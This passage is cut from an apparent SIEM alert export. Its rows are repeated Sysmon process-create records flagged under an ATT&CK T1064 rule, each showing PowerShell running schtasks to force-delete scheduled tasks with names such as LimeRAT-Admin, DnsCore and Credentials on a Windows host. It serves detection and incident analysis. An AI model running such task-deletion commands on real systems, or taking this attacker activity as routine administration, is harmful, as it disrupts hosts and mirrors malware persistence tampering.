-s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:38.469",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:10.247 +ProcessGuid: {df9fc3d3-b3fa-5ecf-0000-0010ec272f00} +ProcessId: 5688 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:10.263397900Z"",""eventRecordID"":""3587"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:10.247\r\nProcessGuid: {df9fc3d3-b3fa-5ecf-0000-0010ec272f00}\r\nProcessId: 5688\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:10.247"",""processGuid"":""{df9fc3d3-b3fa-5ecf-0000-0010ec272f00}"",""processId"":""5688"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:38.438",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:10.189 +ProcessGuid: {df9fc3d3-b3fa-5ecf-0000-00102f262f00} +ProcessId: 1124 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN LimeRAT-Admin /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN LimeRAT-Admin /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:10.220235500Z"",""eventRecordID"":""3586"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:10.189\r\nProcessGuid: {df9fc3d3-b3fa-5ecf-0000-00102f262f00}\r\nProcessId: 1124\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN LimeRAT-Admin /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:10.189"",""processGuid"":""{df9fc3d3-b3fa-5ecf-0000-00102f262f00}"",""processId"":""1124"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN LimeRAT-Admin /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:38.409",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:10.117 +ProcessGuid: {df9fc3d3-b3fa-5ecf-0000-00103e242f00} +ProcessId: 5044 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN HispDemorn /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HispDemorn /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:10.145187900Z"",""eventRecordID"":""3585"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:10.117\r\nProcessGuid: {df9fc3d3-b3fa-5ecf-0000-00103e242f00}\r\nProcessId: 5044\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HispDemorn /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:10.117"",""processGuid"":""{df9fc3d3-b3fa-5ecf-0000-00103e242f00}"",""processId"":""5044"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN HispDemorn /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:38.395",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:10.087 +ProcessGuid: {df9fc3d3-b3fa-5ecf-0000-001068222f00} +ProcessId: 6204 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN werclpsyport /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN werclpsyport /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:10.091051500Z"",""eventRecordID"":""3584"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:10.087\r\nProcessGuid: {df9fc3d3-b3fa-5ecf-0000-001068222f00}\r\nProcessId: 6204\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN werclpsyport /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:10.087"",""processGuid"":""{df9fc3d3-b3fa-5ecf-0000-001068222f00}"",""processId"":""6204"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN werclpsyport /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:38.366",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:10.049 +ProcessGuid: {df9fc3d3-b3fa-5ecf-0000-001076202f00} +ProcessId: 1520 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN TablteInputout /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN TablteInputout /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:10.052315100Z"",""eventRecordID"":""3583"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:10.049\r\nProcessGuid: {df9fc3d3-b3fa-5ecf-0000-001076202f00}\r\nProcessId: 1520\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN TablteInputout /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:10.049"",""processGuid"":""{df9fc3d3-b3fa-5ecf-0000-001076202f00}"",""processId"":""1520"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN TablteInputout /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:38.343",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:10.022 +ProcessGuid: {df9fc3d3-b3fa-5ecf-0000-0010a81e2f00} +ProcessId: 6348 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Credentials /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Credentials /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:10.024054200Z"",""eventRecordID"":""3582"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:10.022\r\nProcessGuid: {df9fc3d3-b3fa-5ecf-0000-0010a81e2f00}\r\nProcessId: 6348\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Credentials /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:10.022"",""processGuid"":""{df9fc3d3-b3fa-5ecf-0000-0010a81e2f00}"",""processId"":""6348"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Credentials /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:38.312",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:09.965 +ProcessGuid: {df9fc3d3-b3f9-5ecf-0000-0010901c2f00} +ProcessId: 4668 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WebServers /F +CurrentDirectory: C:\Users\John Williams\Documents\ 